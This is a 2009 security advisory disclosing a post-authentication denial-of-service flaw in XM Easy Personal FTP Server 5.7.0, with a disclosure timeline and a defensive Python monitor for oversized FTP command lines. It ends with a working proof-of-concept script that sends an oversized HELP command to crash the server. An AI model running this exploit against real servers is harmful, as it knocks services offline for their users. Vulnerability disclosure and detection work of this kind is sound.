XM Easy Personal FTP Server Multiple DoS vulnerabilities
Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10
Date of Discovery: 14-May-2009
Vendor: Dxmsoft
URL: http://www.dxm2008.com/
Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. Multiple denial-of-service
vulnerabilities exist in XM Personal FTP Server that cause the application to crash when a long
list of arguments is sent to certain FTP commands after authentication.
Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent
to certain FTP commands such as HELP or TYPE. When a long value (> 4700 bytes) is passed as a
parameter to these commands, the FTP server cannot process it and crashes. Note that this
is a post-authentication vulnerability, so a user must be logged in to exploit it.
No registers are overwritten, hence remote code execution may not be possible.
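The oversized command line described above can be spotted on the control channel before it reaches the server. The Python 3 monitor below is an added example, not part of the original advisory or the vendor's code; the class name, the 512-byte limit and the sample traffic are assumptions constructed for illustration.

```python
MAX_LINE_LEN = 512  # assumed policy limit, far below the ~4700 bytes cited in the advisory


class FtpLineLengthMonitor:
    """Scans client-to-server FTP control bytes for one session (hypothetical helper)."""

    def __init__(self, max_line_len=MAX_LINE_LEN):
        self.max_line_len = max_line_len
        self.buf = bytearray()
        self.discarding = False  # True while skipping the tail of a reported line

    def _alert(self, line, complete):
        verb = line.split(b" ", 1)[0][:8].upper().decode("ascii", "replace")
        return {"verb": verb, "length": len(line), "complete": complete}

    def feed(self, data):
        """Accept one chunk (any TCP segmentation) and return a list of alerts."""
        alerts = []
        self.buf += data
        while True:
            end = self.buf.find(b"\n")
            if end == -1:
                break
            line = bytes(self.buf[:end]).rstrip(b"\r")
            del self.buf[:end + 1]
            if self.discarding:
                self.discarding = False  # end of a line that was already reported
            elif len(line) > self.max_line_len:
                alerts.append(self._alert(line, complete=True))
        if self.discarding:
            self.buf.clear()  # still inside the reported line: keep memory bounded
        elif len(self.buf) > self.max_line_len:
            # Unterminated line already over the limit: report once, then drop it.
            alerts.append(self._alert(bytes(self.buf), complete=False))
            self.discarding = True
            self.buf.clear()
        return alerts


def demo():
    # Constructed sample traffic, split at arbitrary segment boundaries.
    segments = [b"USER test\r\nPASS te",
                b"st\r\nTYPE I\r\nHELP " + b"A" * 3000,
                b"A" * 2000 + b"\r\nNOOP\r\n"]
    mon = FtpLineLengthMonitor()
    return [a for seg in segments for a in mon.feed(seg)]


if __name__ == "__main__":
    print(demo())
```

The monitor reports the line as soon as the buffered bytes exceed the limit, without waiting for the terminating CRLF, and it never holds more than one limit's worth of data plus the current chunk.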
Severity:
High
Solution:
No patches available from vendor
No workaround is available at this time
Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure
#!/usr/bin/python
# Python 2 proof of concept for the post-authentication DoS described above.
import os
import sys
import time
from ftplib import FTP

def usage():
    print "[...XM Personal FTP Server 5.7.0 DoS Exploit...]"
    print "[...neeraj(.)thakar(at)gmail(.)com...]\n"
    print "Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n"
    print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking... :P\n"

if __name__ == "__main__":
    ftpport = '21'
    # get the args..
    # Three arguments are required (server, username, password).
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)
    ftpserver = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]
    print "Connecting to "+ftpserver+" using "+user+"....",
    # Try opening a connection to the FTP server
    try:
        F = FTP(ftpserver)
        F.timeout = 3
        if F:
            print 'Connected !'
    except:
        print "\nCould not connect to the Server :(\n"
        sys.exit(1)
    # Lets create the Buffer..
    # 5000 bytes exceeds the ~4700-byte threshold given in Details.
    crap = "A" * 5000
    # Creat'in da'bomb
    dabomb = 'HELP '+crap
    print "Press any key to login.."
    ch = sys.stdin.read(1)
    # Lets login
    try:
        F.login(user, passwd)
    except:
        print "Oops.. Looks like you forgot to create a login !!\n"
        F.quit()
        sys.exit(1)
    print "Target Locked, Press any key to fire..",
    ch = sys.stdin.read(1)
    print 'Sendin Da\'Bomb..'
    # An exception here means the server stopped responding to the command.
    try:
        F.sendcmd(dabomb)
    except:
        print 'Target destroyed !! Mission successfull..!'
        print 'Returning to base..'
    F.close()
    sys.exit(0)